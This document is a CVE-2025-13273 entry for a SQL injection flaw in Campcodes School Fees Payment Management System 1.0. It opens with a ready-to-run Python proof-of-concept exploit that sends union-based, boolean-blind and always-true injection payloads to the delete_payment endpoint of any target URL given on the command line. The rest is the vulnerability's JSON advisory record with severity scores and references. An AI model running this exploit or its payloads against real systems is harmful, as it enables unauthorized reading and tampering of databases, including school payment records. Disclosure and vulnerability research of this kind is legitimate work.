CVE-2025-13273

#!/usr/bin/env python3 """ CVE-2025-13273 SQL Injection PoC Target: Campcodes School Fees Payment Management System 1.0 Vulnerability: SQL Injection in /ajax.php?action=delete_payment (ID parameter) """ import requests import sys from urllib.parse import urlencode def test_sql_injection(target_url, payload): """ Test SQL injection vulnerability """ params = { 'action': 'delete_payment', 'ID': payload } try: response = requests.get(f"{target_url}/ajax.php", params=params, timeout=10) return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def extract_database_version(target_url): """ Extract database version using UNION-based injection """ # Payload to extract MySQL version payload = "' UNION SELECT NULL,version(),NULL,NULL,NULL-- -" response = test_sql_injection(target_url, payload) if response and response.status_code == 200: print(f"[+] Response received. Check response for database version.") print(f"[+] Response length: {len(response.text)}") return response.text return None def blind_boolean_injection(target_url): """ Demonstrate blind boolean-based SQL injection """ # True condition - should return normal response true_payload = "' AND 1=1-- -" # False condition - should return different response false_payload = "' AND 1=2-- -" print("[*] Testing true condition...") true_resp = test_sql_injection(target_url, true_payload) print("[*] Testing false condition...") false_resp = test_sql_injection(target_url, false_payload) if true_resp and false_resp: if true_resp.text != false_resp.text: print("[+] Blind SQL injection confirmed!") print(f"[+] True response length: {len(true_resp.text)}") print(f"[+] False response length: {len(false_resp.text)}") def main(): if len(sys.argv) < 2: print("Usage: python3 cve-2025-13273.py <target_url>") print("Example: python3 cve-2025-13273.py http://target.com/school-system") sys.exit(1) target = sys.argv[1].rstrip('/') print(f"[*] Target: {target}") print(f"[*] Testing CVE-2025-13273 SQL Injection\n") # Test basic injection print("[*] Step 1: Testing basic SQL injection...") basic_payload = "' OR '1'='1" test_sql_injection(target, basic_payload) # Test blind boolean injection print("\n[*] Step 2: Testing blind boolean injection...") blind_boolean_injection(target) # Extract database version print("\n[*] Step 3: Extracting database information...") extract_database_version(target) print("\n[*] PoC execution completed.") print("[*] Manual verification recommended.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-13273", "sourceIdentifier": "[email protected]", "published": "2025-11-17T10:15:57.770", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Campcodes School Fees Payment Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /ajax.php?action=delete_payment. Performing a manipulation of the argument ID results in sql injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:school_fees_payment_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "450DC6BC-1A28-40FC-987F-4AA647D910F5"}]}]}], "references": [{"url": "https://github.com/ASantsSec/CVE/issues/20", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332608", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332608", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.690048", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}]}}